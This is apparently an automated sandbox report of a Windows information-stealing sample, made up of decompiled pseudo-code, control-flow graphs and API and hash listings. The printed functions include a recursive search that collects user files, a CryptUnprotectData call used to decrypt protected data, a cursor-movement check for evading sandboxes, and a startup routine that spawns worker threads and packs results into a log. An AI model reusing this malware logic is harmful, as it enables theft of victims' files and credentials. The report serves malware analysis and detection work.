                                                  control_flow_graph 616 401d2f-401d41 617 401d47-401d51 616->617 618 401efb-401f00 616->618 617->618 619 401d57-401d81 call 4035e8 FindFirstFileW 617->619 619->618 622 401d87-401dcb call 4034f0 call 403623 619->622 627 401dd0-401df5 call 403623 * 2 622->627 632 401ed7-401ee5 FindNextFileW 627->632 633 401dfb-401e14 call 4035e8 627->633 634 401ef2-401ef6 call 40351e 632->634 635 401ee7-401eed 632->635 639 401e16-401e26 call 403713 633->639 640 401e47-401e4c 633->640 634->618 635->627 639->640 647 401e28-401e38 call 403713 639->647 641 401ec8-401ed3 640->641 642 401e4e-401e58 640->642 641->632 642->641 644 401e5a-401e67 call 40403b 642->644 650 401ec1-401ec3 call 40351e 644->650 651 401e69-401e80 call 403623 call 403b10 644->651 647->640 655 401e3a-401e3d call 401d2f 647->655 650->641 651->650 661 401e82-401eba call 4035e8 call 403e66 651->661 658 401e42 655->658 658->641 661->650
                                                  C-Code - Quality: 95%
                                                  			E00401D2F(intOrPtr _a4) {
				struct _WIN32_FIND_DATAW _v596;
				short _v600;
				short _v602;
				short _v604;
				short _v606;
				char _v608;
				signed int _v612;
				intOrPtr _v616;
				void* _t38;
				WCHAR* _t39;
				intOrPtr _t42;
				signed int _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				void* _t51;
				int _t54;
				WCHAR* _t57;
				WCHAR* _t65;
				void* _t75;
				WCHAR* _t95;
				WCHAR* _t100;
				signed int _t101;
				signed int _t102;
				void* _t104;
				void* _t105;

				_t104 = (_t102 & 0xfffffff8) - 0x268;
				if(_a4 == 0) {
					L19:
					return _t38;
				}
				_t107 =  *0x40802c - 0x81f39c19;
				if( *0x40802c == 0x81f39c19) {
					goto L19;
				}
				_t39 =  *0x4084f4; // 0xf7ed80
				E004035E8(_t107, _t39, L"%s\\*", _t39);
				_t105 = _t104 + 0xc;
				_t38 = FindFirstFileW( *0x4084f4,  &_v596); // executed
				_t75 = _t38;
				if(_t75 != 0xffffffff) {
					_t42 = E004034F0(0x208);
					_t100 =  *0x4084f4; // 0xf7ed80
					_v616 = _t42;
					_t43 = E00403623(_t100);
					 *((short*)(_t100 + _t43 * 2 - 4)) = 0;
					_t44 = 0x44;
					_v608 = _t44;
					_t45 = 0x6f;
					_v606 = _t45;
					_t46 = 0x63;
					_v604 = _t46;
					_t47 = 0x73;
					_v602 = _t47;
					_v600 = 0;
					while(1) {
						_v612 = E00403623(_t100) & 0x0000ffff;
						_t51 = E00403623( &(_v596.cFileName));
						_t110 = _t51 + _v612 + 3 - 0x104;
						if(_t51 + _v612 + 3 < 0x104) {
							_push( &(_v596.cFileName));
							E004035E8(_t110, _t100, L"%s\\%s", _t100);
							_t105 = _t105 + 0x10;
							if((_v596.dwFileAttributes & 0x00000010) == 0 || E00403713( &(_v596.cFileName), L"..") == 0 || E00403713( &(_v596.cFileName), ".") == 0) {
								__eflags = _v596.dwFileAttributes & 0x000000a7;
								if((_v596.dwFileAttributes & 0x000000a7) != 0) {
									__eflags = _v596.nFileSizeLow - 1 - 0x1e847e;
									if(__eflags <= 0) {
										_t101 = E0040403B( &(_v596.cFileName), __eflags);
										__eflags = _t101;
										if(_t101 != 0) {
											__eflags = E00403B10(_t101, E00403623(_t101) + _t62) - 0xc4a9daf5;
											if(__eflags == 0) {
												_t65 =  *0x4084f4; // 0xf7ed80
												_push( &(_t65[ *0x4084f8 & 0x0000ffff]));
												E004035E8(__eflags, _v616, L"%s%s",  &_v608);
												_t95 =  *0x4084f4; // 0xf7ed80
												E00403E66(_a4, _t95, __eflags, _v616);
												_t105 = _t105 + 0x14;
												 *0x4084fc =  *0x4084fc + 1;
												__eflags =  *0x4084fc;
											}
										}
										E0040351E(_t101);
									}
								}
							} else {
								E00401D2F(_a4); // executed
							}
							_t57 =  *0x4084f4; // 0xf7ed80
							_t57[_v612] = 0;
						}
						_t54 = FindNextFileW(_t75,  &_v596); // executed
						if(_t54 == 0) {
							break;
						}
						_t100 =  *0x4084f4; // 0xf7ed80
					}
					_t38 = E0040351E(_v616);
				}
			}






























                                                  0x00401d35
                                                  0x00401d41
                                                  0x00401efb
                                                  0x00401f00
                                                  0x00401f00
                                                  0x00401d47
                                                  0x00401d51
                                                  0x00000000
                                                  0x00000000
                                                  0x00401d57
                                                  0x00401d63
                                                  0x00401d68
                                                  0x00401d76
                                                  0x00401d7c
                                                  0x00401d81
                                                  0x00401d8c
                                                  0x00401d91
                                                  0x00401d99
                                                  0x00401d9d
                                                  0x00401da6
                                                  0x00401dab
                                                  0x00401dae
                                                  0x00401db3
                                                  0x00401db6
                                                  0x00401dbb
                                                  0x00401dbc
                                                  0x00401dc3
                                                  0x00401dc4
                                                  0x00401dcb
                                                  0x00401dd0
                                                  0x00401dde
                                                  0x00401de2
                                                  0x00401df0
                                                  0x00401df5
                                                  0x00401dff
                                                  0x00401e07
                                                  0x00401e0c
                                                  0x00401e14
                                                  0x00401e47
                                                  0x00401e4c
                                                  0x00401e53
                                                  0x00401e58
                                                  0x00401e63
                                                  0x00401e65
                                                  0x00401e67
                                                  0x00401e7b
                                                  0x00401e80
                                                  0x00401e89
                                                  0x00401e91
                                                  0x00401ea0
                                                  0x00401ea9
                                                  0x00401eb2
                                                  0x00401eb7
                                                  0x00401eba
                                                  0x00401eba
                                                  0x00401eba
                                                  0x00401e80
                                                  0x00401ec3
                                                  0x00401ec3
                                                  0x00401e58
                                                  0x00401e3a
                                                  0x00401e3d
                                                  0x00401e3d
                                                  0x00401ec8
                                                  0x00401ed3
                                                  0x00401ed3
                                                  0x00401edd
                                                  0x00401ee5
                                                  0x00000000
                                                  0x00000000
                                                  0x00401ee7
                                                  0x00401ee7
                                                  0x00401ef6
                                                  0x00401ef6

                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(?), ref: 00401D76
                                                    • Part of subcall function 004034F0: EnterCriticalSection.KERNEL32(004084D4,?,?,00403B95,?,0040223F), ref: 004034FA
                                                    • Part of subcall function 004034F0: GetProcessHeap.KERNEL32(00000008,?,?,?,00403B95,?,0040223F), ref: 00403503
                                                    • Part of subcall function 004034F0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00403B95,?,0040223F), ref: 0040350A
                                                    • Part of subcall function 004034F0: LeaveCriticalSection.KERNEL32(004084D4,?,?,?,00403B95,?,0040223F), ref: 00403513
                                                  • FindNextFileW.KERNELBASE(00000000,?), ref: 00401EDD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: CriticalFileFindHeapSection$AllocateEnterFirstLeaveNextProcess
                                                  • String ID: %s%s$%s\%s$%s\*
                                                  • API String ID: 3555643018-2064654797
                                                  • Opcode ID: 440ed711fed2fb8f36dd8926b704fde87bff727aee1fae3d6b04d351973b976a
                                                  • Instruction ID: 650e7d6a7c76fb24c6780d963a35dd922da22983f4b97d23ba0b1c2adfca54df
                                                  • Opcode Fuzzy Hash: 440ed711fed2fb8f36dd8926b704fde87bff727aee1fae3d6b04d351973b976a
                                                  • Instruction Fuzzy Hash: 9B419F716082419BC714EF25DD41A2F77E8AF84305F10493FFD81A72E2EB39AA05879E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401C87 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69encryptionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 666 401c87-401cc2 call 40439a 669 401d22-401d2e 666->669 670 401cc4-401ceb call 40355e CryptUnprotectData 666->670 673 401cf8-401cfd 670->673 674 401ced-401cf6 670->674 673->669 675 401cff-401d1c CryptProtectData 673->675 674->669 675->669
                                                  APIs
                                                    • Part of subcall function 0040439A: GetModuleHandleA.KERNEL32(ntdl,0000011C,?,?,?,?,?,?,?,004044D8), ref: 004043AC
                                                    • Part of subcall function 0040439A: LoadLibraryA.KERNELBASE(ntdl,?,?,?,?,?,?,?,004044D8), ref: 004043B9
                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00401CE6
                                                  • CryptProtectData.CRYPT32(?,?,00000000,00000000,00000000,00000000,?), ref: 00401D1C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: CryptData$HandleLibraryLoadModuleProtectUnprotect
                                                  • String ID: CRYPT32.dll$Poverty is the parent of crime.
                                                  • API String ID: 3642467563-1885057629
                                                  • Opcode ID: e00161306afa63e9811d6efb7f220ced9919129b07580ee552478133f7538944
                                                  • Instruction ID: b6cfde3746927ffec1bbe8d416cc9fc3ff119c27af47a0e536ab53ab403d3b37
                                                  • Opcode Fuzzy Hash: e00161306afa63e9811d6efb7f220ced9919129b07580ee552478133f7538944
                                                  • Instruction Fuzzy Hash: 88115CB5D0020DABDB10DF99C8819EFBBBCEF48314F50456AE945B3240E774AE09CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402192 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 676 402192-4021a4 GetCursorPos 677 4021a6 676->677 678 4021a8-4021b1 676->678 679 4021df-4021e2 677->679 680 4021b4-4021b7 678->680 680->679 681 4021b9-4021c9 GetCursorPos 680->681 682 4021d3 681->682 683 4021cb-4021d1 681->683 682->679 683->682 684 4021d5-4021dd Sleep 683->684 684->680
                                                  C-Code - Quality: 68%
                                                  			E00402192() {
				long _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				int _t12;
				long _t19;

				_t12 = GetCursorPos( &_v20);
				if(_t12 == 0) {
					return _t12;
				}
				_v8 = _v20.x;
				_t4 =  &(_v20.y); // 0x40227e
				_v12 =  *_t4;
				while(1 != 0) {
					GetCursorPos( &_v20);
					_t19 = _v20.x;
					if(_t19 != _v8) {
						L6:
						return _t19;
					}
					_t9 =  &(_v20.y); // 0x40227e
					_t19 =  *_t9;
					if(_t19 != _v12) {
						goto L6;
					}
					Sleep(0x64); // executed
				}
				return 1;
			}








                                                  0x0040219c
                                                  0x004021a4
                                                  0x00000000
                                                  0x00000000
                                                  0x004021ab
                                                  0x004021ae
                                                  0x004021b1
                                                  0x004021b4
                                                  0x004021bd
                                                  0x004021c3
                                                  0x004021c9
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004021cb
                                                  0x004021cb
                                                  0x004021d1
                                                  0x00000000
                                                  0x00000000
                                                  0x004021d7
                                                  0x004021d7
                                                  0x004021e2

                                                  APIs
                                                  • GetCursorPos.USER32(?,?,0040227E), ref: 0040219C
                                                  • GetCursorPos.USER32(?,?,0040227E), ref: 004021BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: Cursor
                                                  • String ID: ~"@
                                                  • API String ID: 3268636600-1883282424
                                                  • Opcode ID: a911841c05d4c3f65ddbd01571e903946c400258c72f5d3a3787f254ffcd9395
                                                  • Instruction ID: 77f77d783b28b98305d308f0ddaeab0996e441ebfdf2e17e4645b00e22eb7271
                                                  • Opcode Fuzzy Hash: a911841c05d4c3f65ddbd01571e903946c400258c72f5d3a3787f254ffcd9395
                                                  • Instruction Fuzzy Hash: 62F0BD31D04209EBCB10DFA4CA499AEB7B9AB04300F5045A6EA15F72C0E778AA418B5A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040351E Relevance: 3.0, APIs: 2, Instructions: 8memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 709 40351e-403520 710 403532 709->710 711 403522-40352c GetProcessHeap RtlFreeHeap 709->711 711->710
                                                  C-Code - Quality: 100%
                                                  			E0040351E(void* __ecx) {
				void* _t1;
				char _t3;

				if(__ecx != 0) {
					_t3 = RtlFreeHeap(GetProcessHeap(), 0, __ecx); // executed
					return _t3;
				}
				return _t1;
			}





                                                  0x00403520
                                                  0x0040352c
                                                  0x00000000
                                                  0x0040352c
                                                  0x00403532

                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00403026,?,?,?,?,?,?,?,?,?,?,?,004035DC,?), ref: 00403525
                                                  • RtlFreeHeap.NTDLL(00000000,?,?,?,?,?,?,?,?,?,?,?,004035DC,?,00000400,?), ref: 0040352C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: Heap$FreeProcess
                                                  • String ID:
                                                  • API String ID: 3859560861-0
                                                  • Opcode ID: 5a814851b518f180a18ac01642816ee6c1d3c3ca3fd15fd3dc1afb4df2b2407a
                                                  • Instruction ID: 6f93d42a4c34445aa6580dae24056dbfe0e0501b0f68dafdb57af497b5c344e4
                                                  • Opcode Fuzzy Hash: 5a814851b518f180a18ac01642816ee6c1d3c3ca3fd15fd3dc1afb4df2b2407a
                                                  • Instruction Fuzzy Hash: 44B092B0989100AAEE085BA0AE2DB2B29189B00303F408A68B106B02A086786900863A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004021E3 Relevance: 40.6, APIs: 14, Strings: 9, Instructions: 305synchronizationCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 90%
                                                  			_entry_() {
				signed int _v5;
				signed char _v6;
				signed char _v7;
				WCHAR* _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				signed int _v40;
				void _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				char _v60;
				intOrPtr _v64;
				void* _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				void _v364;
				void* __esi;
				signed int _t92;
				signed int _t93;
				signed int _t96;
				signed char _t100;
				signed char _t112;
				signed char _t115;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				signed int _t122;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				signed int _t130;
				void* _t133;
				void* _t135;
				void* _t137;
				void* _t139;
				signed int _t152;
				signed int _t157;
				signed char _t159;
				signed int _t160;
				signed int _t161;
				intOrPtr _t167;
				signed int _t171;
				intOrPtr _t179;
				signed int _t180;
				signed int _t181;
				signed int _t182;
				signed int _t188;
				signed int _t189;
				signed int _t190;
				intOrPtr _t202;
				void* _t204;
				void* _t221;
				void* _t223;
				void* _t224;

				_t90 = InitializeCriticalSectionAndSpinCount(0x4084d4, 0xda3);
				if(_t90 != 0) {
					_t90 = CreateMutexA(0, 0, "e9ad4a13-a667-4534-bcfa-4791968c5e00"); // executed
					_v52 = _t90;
					__eflags = _v52;
					if(_v52 == 0) {
						L34:
						ExitProcess(0); // executed
					}
					__eflags = GetLastError() - 0xb7;
					if(__eflags == 0) {
						goto L34;
					}
					_t204 = 0x65;
					E00403B82( &_v44, _t204, __eflags);
					__eflags = _v40;
					if(_v40 == 0) {
						L33:
						DeleteCriticalSection(0x4084d4);
						_t92 = 2;
						_t93 = _t92 << 1;
						__eflags = _t93;
						_t87 = _t93 + 0x4084c0; // 0xf0006
						_t167 =  *0x4080b4; // 0xed0000
						 *(_t167 + 1) =  *_t87 & 0x0000ffff;
						_t90 =  *0x4080b4(_v52);
						goto L34;
					}
					E0040355E( &_v364, 0, 0x11c);
					_v364 = 0x11c;
					_t96 = E004044AC( &_v364, _t221); // executed
					__eflags = _t96;
					if(_t96 < 0) {
						goto L33;
					}
					E00402192(); // executed
					_push(_v352);
					_push(_v356);
					E004035C3(__eflags, 0, "- OperationSystem: %d:%d:%d\r\n", _v360); // executed
					_t171 = 0x47;
					memcpy(_t224 + 0x14 - 0x11c,  &_v364, _t171 << 2);
					_t100 = E00404511(); // executed
					__eflags = (_t100 & 0x000000ff) - 1;
					if((_t100 & 0x000000ff) != 1) {
						goto L33;
					}
					 *0x4084ec = E004034F0(0x208);
					 *0x4084cc = E004034F0(0x208);
					 *0x4084f4 = E004034F0(0x208);
					__eflags =  *0x4084ec;
					if( *0x4084ec == 0) {
						L29:
						E00403D26( &_v44, L"$d.log",  *0x408500,  *0x408504); // executed
						_t179 =  *0x408500; // 0x8b83020
						E0040351E(_t179);
						_t180 =  *0x4084f4; // 0xf7ed80
						E0040351E(_t180);
						_t181 =  *0x4084cc; // 0xf7eb70
						E0040351E(_t181);
						_t182 =  *0x4084ec; // 0xf7e960
						E0040351E(_t182);
						_v64 = E00403BAB( &_v44);
						E00402192(); // executed
						while(1) {
							_t112 = E00405002(_v40, _v64); // executed
							__eflags = _t112 & 0x000000ff;
							if((_t112 & 0x000000ff) != 0) {
								break;
							}
						}
						E0040351E(_v40);
						goto L33;
					}
					__eflags =  *0x4084cc;
					if( *0x4084cc == 0) {
						goto L29;
					}
					__eflags =  *0x4084f4;
					if( *0x4084f4 == 0) {
						goto L29;
					}
					_v20 = 0x73;
					_v19 = 0x68;
					_v18 = 0x65;
					_v17 = 0x6c;
					_v16 = 0x6c;
					_v15 = 0x33;
					_v14 = 0x32;
					_v13 = 0;
					_v60 = 0xc7652b3f;
					_v56 = _v56 & 0x00000000;
					_t207 =  &_v60;
					_t25 =  &_v20; // 0x73, executed
					_t115 = E0040439A(_t25,  &_v60); // executed
					__eflags = (_t115 & 0x000000ff) - 1;
					if((_t115 & 0x000000ff) != 1) {
						goto L29;
					}
					E00401F03(); // executed
					_t118 = 4;
					_t119 = _t118 * 0;
					__eflags =  *((intOrPtr*)(_t119 + 0x40802c)) - 0x81f39c19;
					if( *((intOrPtr*)(_t119 + 0x40802c)) != 0x81f39c19) {
						L14:
						_t120 = 4;
						_t122 =  *((intOrPtr*)(_t223 + _t120 * 0 - 0x38))(0, 0x1c, 0, 0,  *0x4084cc);
						__eflags = _t122;
						if(_t122 >= 0) {
							_t188 =  *0x4084cc; // 0xf7eb70
							 *0x4084d0 = E00403623(_t188);
							_t124 = 4;
							_t126 =  *((intOrPtr*)(_t223 + _t124 * 0 - 0x38))(0, 0, 0, 0,  *0x4084f4);
							__eflags = _t126;
							if(_t126 >= 0) {
								_t189 =  *0x4084f4; // 0xf7ed80
								 *0x4084f8 = E00403623(_t189);
								_t128 = 4;
								_t130 =  *((intOrPtr*)(_t223 + _t128 * 0 - 0x38))(0, 0x1a, 0, 0,  *0x4084ec);
								__eflags = _t130;
								if(_t130 >= 0) {
									_t190 =  *0x4084ec; // 0xf7e960
									 *0x4084f0 = E00403623(_t190);
									_t133 = CreateThread(0, 0, E004019CF,  &_v44, 0, 0); // executed
									_v80 = _t133;
									_t135 = CreateThread(0, 0, E00404E34,  &_v44, 0, 0); // executed
									_v76 = _t135;
									_t137 = CreateThread(0, 0, E00401D2F,  &_v44, 0, 0); // executed
									_v72 = _t137;
									_t139 = CreateThread(0, 0, E00404868,  &_v44, 0, 0); // executed
									_v68 = _t139;
									WaitForMultipleObjects(4,  &_v80, 1, 0xffffffff); // executed
									E0040202A(_t207); // executed
									_v5 = 0;
									while(1) {
										__eflags = (_v5 & 0x000000ff) - 3;
										if((_v5 & 0x000000ff) >= 3) {
											break;
										}
										_t157 = _v5 & 0x000000ff;
										__eflags =  *((intOrPtr*)(_t223 + _t157 * 4 - 0x4c)) - 0xffffffff;
										if( *((intOrPtr*)(_t223 + _t157 * 4 - 0x4c)) != 0xffffffff) {
											_t160 = 2;
											_t161 = _t160 << 0;
											__eflags = _t161;
											_t60 = _t161 + 0x4084c0; // 0xf0006
											_t202 =  *0x4080b4; // 0xed0000
											 *(_t202 + 1) =  *_t60 & 0x0000ffff;
											 *0x4080b4( *((intOrPtr*)(_t223 + (_v5 & 0x000000ff) * 4 - 0x4c))); // executed
										}
										_t159 = _v5 + 1;
										__eflags = _t159;
										_v5 = _t159;
									}
									E00404ECE(0x4084fc, 2);
									E00404ECE(0x4084ca, 1);
									_v6 = 0x40;
									E00404ECE( &_v6, 1);
									E00404ECE(0x408063, _v6 & 0x000000ff);
									_v7 = 0x24;
									E00404ECE( &_v7, 1);
									E00404ECE("e9ad4a13-a667-4534-bcfa-4791968c5e00", _v7 & 0x000000ff);
									_v12 = E004034F0(0x208);
									__eflags = _v12;
									if(_v12 != 0) {
										GetModuleFileNameW(0, _v12, 0x208);
									}
									_t152 = E00403623(_v12) << 1;
									__eflags = _t152;
									_v48 = _t152;
									E00404ECE( &_v48, 2);
									E00404ECE(_v12, _v48);
									E0040351E(_v12);
									goto L29;
								}
								ExitProcess(0);
							}
							ExitProcess(0);
						}
						ExitProcess(0);
					}
					_v32 = 0x6b;
					_v31 = 0x65;
					_v30 = 0x72;
					_v29 = 0x6e;
					_v28 = 0x65;
					_v27 = 0x6c;
					_v26 = 0x33;
					_v25 = 0x32;
					_v24 = 0;
					_t207 = 0x40802c;
					_t36 =  &_v32; // 0x6b
					_t90 = E0040439A(_t36, 0x40802c) & 0x000000ff;
					__eflags = _t90 - 2;
					if(_t90 == 2) {
						goto L14;
					}
					L35:
					return _t90;
				}
				goto L35;
			}













































































                                                  0x004021f8
                                                  0x00402200
                                                  0x00402210
                                                  0x00402216
                                                  0x00402219
                                                  0x0040221d
                                                  0x00402660
                                                  0x00402662
                                                  0x00402662
                                                  0x00402229
                                                  0x0040222e
                                                  0x00000000
                                                  0x00000000
                                                  0x00402236
                                                  0x0040223a
                                                  0x0040223f
                                                  0x00402243
                                                  0x00402637
                                                  0x0040263c
                                                  0x00402644
                                                  0x00402645
                                                  0x00402645
                                                  0x00402647
                                                  0x0040264e
                                                  0x00402654
                                                  0x0040265a
                                                  0x00000000
                                                  0x0040265a
                                                  0x00402256
                                                  0x0040225c
                                                  0x0040226c
                                                  0x00402271
                                                  0x00402273
                                                  0x00000000
                                                  0x00000000
                                                  0x00402279
                                                  0x0040227e
                                                  0x00402284
                                                  0x00402297
                                                  0x004022a7
                                                  0x004022b0
                                                  0x004022b2
                                                  0x004022c0
                                                  0x004022c3
                                                  0x00000000
                                                  0x00000000
                                                  0x004022d3
                                                  0x004022e2
                                                  0x004022f1
                                                  0x004022f6
                                                  0x004022fd
                                                  0x004025c2
                                                  0x004025d6
                                                  0x004025dd
                                                  0x004025e3
                                                  0x004025e8
                                                  0x004025ee
                                                  0x004025f3
                                                  0x004025f9
                                                  0x004025fe
                                                  0x00402604
                                                  0x00402611
                                                  0x00402614
                                                  0x00402619
                                                  0x0040261f
                                                  0x00402629
                                                  0x0040262b
                                                  0x00000000
                                                  0x00000000
                                                  0x0040262d
                                                  0x00402632
                                                  0x00000000
                                                  0x00402632
                                                  0x00402303
                                                  0x0040230a
                                                  0x00000000
                                                  0x00000000
                                                  0x00402310
                                                  0x00402317
                                                  0x00000000
                                                  0x00000000
                                                  0x0040231d
                                                  0x00402321
                                                  0x00402325
                                                  0x00402329
                                                  0x0040232d
                                                  0x00402331
                                                  0x00402335
                                                  0x00402339
                                                  0x0040233d
                                                  0x00402344
                                                  0x00402348
                                                  0x0040234b
                                                  0x0040234e
                                                  0x00402356
                                                  0x00402359
                                                  0x00000000
                                                  0x00000000
                                                  0x0040235f
                                                  0x00402366
                                                  0x00402367
                                                  0x0040236a
                                                  0x00402374
                                                  0x004023b4
                                                  0x004023c4
                                                  0x004023c8
                                                  0x004023cc
                                                  0x004023ce
                                                  0x004023d8
                                                  0x004023e3
                                                  0x004023f9
                                                  0x004023fd
                                                  0x00402401
                                                  0x00402403
                                                  0x0040240d
                                                  0x00402418
                                                  0x0040242e
                                                  0x00402432
                                                  0x00402436
                                                  0x00402438
                                                  0x00402442
                                                  0x0040244d
                                                  0x00402464
                                                  0x0040246a
                                                  0x0040247e
                                                  0x00402484
                                                  0x00402498
                                                  0x0040249e
                                                  0x004024b2
                                                  0x004024b8
                                                  0x004024c5
                                                  0x004024cb
                                                  0x004024d0
                                                  0x004024de
                                                  0x004024e2
                                                  0x004024e5
                                                  0x00000000
                                                  0x00000000
                                                  0x004024e7
                                                  0x004024eb
                                                  0x004024f0
                                                  0x004024f4
                                                  0x004024f5
                                                  0x004024f5
                                                  0x004024f8
                                                  0x004024ff
                                                  0x00402505
                                                  0x00402510
                                                  0x00402510
                                                  0x004024d9
                                                  0x004024d9
                                                  0x004024db
                                                  0x004024db
                                                  0x00402521
                                                  0x0040252f
                                                  0x00402534
                                                  0x0040253f
                                                  0x0040254e
                                                  0x00402553
                                                  0x0040255e
                                                  0x0040256d
                                                  0x0040257c
                                                  0x0040257f
                                                  0x00402583
                                                  0x0040258f
                                                  0x0040258f
                                                  0x0040259d
                                                  0x0040259d
                                                  0x0040259f
                                                  0x004025aa
                                                  0x004025b5
                                                  0x004025bd
                                                  0x00000000
                                                  0x004025bd
                                                  0x0040243c
                                                  0x0040243c
                                                  0x00402407
                                                  0x00402407
                                                  0x004023d2
                                                  0x004023d2
                                                  0x00402376
                                                  0x0040237a
                                                  0x0040237e
                                                  0x00402382
                                                  0x00402386
                                                  0x0040238a
                                                  0x0040238e
                                                  0x00402392
                                                  0x00402396
                                                  0x0040239a
                                                  0x0040239f
                                                  0x004023a7
                                                  0x004023aa
                                                  0x004023ad
                                                  0x00000000
                                                  0x00000000
                                                  0x00402668
                                                  0x00000000
                                                  0x00402668
                                                  0x00000000

                                                  APIs
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(004084D4,00000DA3), ref: 004021F8
                                                  • CreateMutexA.KERNELBASE(00000000,00000000,e9ad4a13-a667-4534-bcfa-4791968c5e00), ref: 00402210
                                                  • GetLastError.KERNEL32 ref: 00402223
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: CountCreateCriticalErrorInitializeLastMutexSectionSpin
                                                  • String ID: $$$d.log$- OperationSystem: %d:%d:%d$@$@Mqt$e9ad4a13-a667-4534-bcfa-4791968c5e00$kernel32$shell32$test1
                                                  • API String ID: 2005177960-2746403547
                                                  • Opcode ID: 97a95da1d7f2aec5c68b4eba05d5da982b444bd723b1dfc14bd941f8863a29f7
                                                  • Instruction ID: 85ae4615496991be6fec230c986a42c8ef5a0d94429a833bfc086e3c78ff9e52
                                                  • Opcode Fuzzy Hash: 97a95da1d7f2aec5c68b4eba05d5da982b444bd723b1dfc14bd941f8863a29f7
                                                  • Instruction Fuzzy Hash: 27C13930904244AEE710AFA0DE0ABAD7B75AF54305F10407EF641BA2E2DFB91A45CB6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404186 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 154COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 73%
                                                  			E00404186(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				char _v36;
				char _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char* _v60;
				signed int _v64;
				char _v68;
				intOrPtr _v84;
				char _v92;
				signed int _t68;
				intOrPtr _t74;
				signed int _t77;
				signed int _t83;
				signed int _t89;
				intOrPtr _t94;
				intOrPtr _t102;
				intOrPtr _t107;
				intOrPtr _t108;
				intOrPtr _t114;

				_v20 = _v20 & 0x00000000;
				if((E0040402B(_a4) & 0x000000ff) != 1) {
					L9:
					return _v20;
				}
				_v16 = E004034F0(0x208);
				_t125 = _v16;
				if(_v16 == 0) {
					L8:
					E0040351E(_v16);
					goto L9;
				}
				E004035E8(_t125, _v16, L"\\??\\%s", _a4);
				E00404010( &_v36, _v16, _t125);
				_v12 = _v12 & 0x00000000;
				E0040355E( &_v28, 0, 8);
				_v68 = 0x18;
				_v64 = _v64 & 0x00000000;
				_v56 = 0x40;
				_v60 =  &_v36;
				_v52 = _v52 & 0x00000000;
				_v48 = _v48 & 0x00000000;
				EnterCriticalSection(0x4084d4);
				_t68 = 2;
				_t23 = 0x4084c0 + _t68 * 0; // 0xf0006
				_t102 =  *0x4080b4; // 0xed0000
				 *(_t102 + 1) =  *_t23 & 0x0000ffff;
				_t74 =  *0x4080b4( &_v12, 0x100001,  &_v68,  &_v28, 0, 0x80, 7, 1, 0x60, 0, 0); // executed
				_v8 = _t74;
				LeaveCriticalSection(0x4084d4);
				if(_v8 < 0) {
					goto L8;
				}
				E0040355E( &_v92, 0, 0x18);
				E0040355E( &_v28, 0, 8);
				EnterCriticalSection(0x4084d4);
				_t77 = 2;
				_t32 = 0x4084c0 + _t77 * 3; // 0xf0006
				_t107 =  *0x4080b4; // 0xed0000
				 *(_t107 + 1) =  *_t32 & 0x0000ffff;
